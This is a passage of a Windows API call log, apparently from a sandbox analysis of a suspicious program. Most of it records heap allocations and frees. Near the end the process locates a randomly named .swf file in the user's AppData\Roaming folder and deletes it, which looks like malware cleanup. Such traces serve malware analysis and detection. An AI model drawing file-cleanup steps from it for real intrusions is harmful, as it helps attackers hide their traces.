Flags=0x0, Size=0x8) returned 0x2e54f18 [0239.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0239.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0239.290] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0239.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0239.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0239.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0239.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0239.290] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0239.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0239.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0239.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0239.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0239.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0239.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0239.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0239.291] FreeLibrary (hLibModule=0x756e0000) returned 1 [0239.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0239.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0239.291] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0239.291] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0239.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0239.291] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0239.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0239.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0239.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0239.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0239.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0239.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0239.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0239.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0239.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0239.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0239.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0239.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0239.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0239.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0239.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0239.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0239.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0239.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0239.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0239.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0239.292] CloseHandle (hObject=0x2d0) returned 1 [0239.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0239.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0239.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0239.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0239.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0239.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0239.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0239.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0239.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0239.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0239.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0239.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0239.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0239.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0239.302] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0239.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0239.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0239.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0239.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0239.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0239.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0239.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0239.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0239.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0239.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0239.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0239.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0239.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0239.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0239.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0239.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0239.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0239.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0239.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0239.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0239.303] CloseHandle (hObject=0x2a0) returned 1 [0239.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0239.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0239.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0239.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0239.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0239.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0239.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0239.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0239.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0239.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0239.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0239.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0239.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0239.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0239.390] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0239.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0239.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0239.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0239.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0239.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0239.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0239.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0239.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0239.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0239.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0239.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0239.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0239.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0239.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0239.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0239.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0239.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0239.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0239.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0239.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0239.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0239.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0239.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0239.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0239.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0239.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0239.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0239.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0239.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0239.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0239.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0239.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0239.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0239.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0239.395] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0239.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0239.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0239.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0239.395] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0239.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0239.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0239.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0239.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0239.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0239.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0239.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0239.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0239.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0239.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0239.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0239.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0239.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0239.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0239.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0239.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0239.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6a) returned 0x2e564e0 [0239.396] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/TXuB6gyi89__NoT9.swf", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\TXuB6gyi89__NoT9.swf", lpFilePart=0x8cedf4*="TXuB6gyi89__NoT9.swf") returned 0x34 [0239.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0239.396] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\TXuB6gyi89__NoT9.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\txub6gyi89__not9.swf")) returned 0x20 [0239.396] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\TXuB6gyi89__NoT9.swf", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc323cf70, ftCreationTime.dwHighDateTime=0x1d5e251, ftLastAccessTime.dwLowDateTime=0x7f105300, ftLastAccessTime.dwHighDateTime=0x1d5e5e7, ftLastWriteTime.dwLowDateTime=0x7f105300, ftLastWriteTime.dwHighDateTime=0x1d5e5e7, nFileSizeHigh=0x0, nFileSizeLow=0x15f46, dwReserved0=0x1, dwReserved1=0x1c, cFileName="TXuB6gyi89__NoT9.swf", cAlternateFileName="TXUB6G~1.SWF")) returned 0xa86f90 [0239.396] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\TXuB6gyi89__NoT9.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\txub6gyi89__not9.swf")) returned 1 [0239.399] FindNextFileW (in: hFindFile=0xa86f90, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc323cf70, ftCreationTime.dwHighDateTime=0x1d5e251, ftLastAccessTime.dwLowDateTime=0x7f105300, ftLastAccessTime.dwHighDateTime=0x1d5e5e7, ftLastWriteTime.dwLowDateTime=0x7f105300, ftLastWriteTime.dwHighDateTime=0x1d5e5e7, nFileSizeHigh=0x0, nFileSizeLow=0x15f46, dwReserved0=0x1, dwReserved1=0x1c, cFileName="TXuB6gyi89__NoT9.swf", cAlternateFileName="TXUB6G~1.SWF")) returned 0 [0239.399] FindClose (in: hFindFile=0xa86f90 | out: hFindFile=0xa86f90) returned 1 [0239.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0239.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0239.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0239.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0239.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0239.399] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0239.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0239.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0239.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0239.400] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0239.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0239.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0239.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0239.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 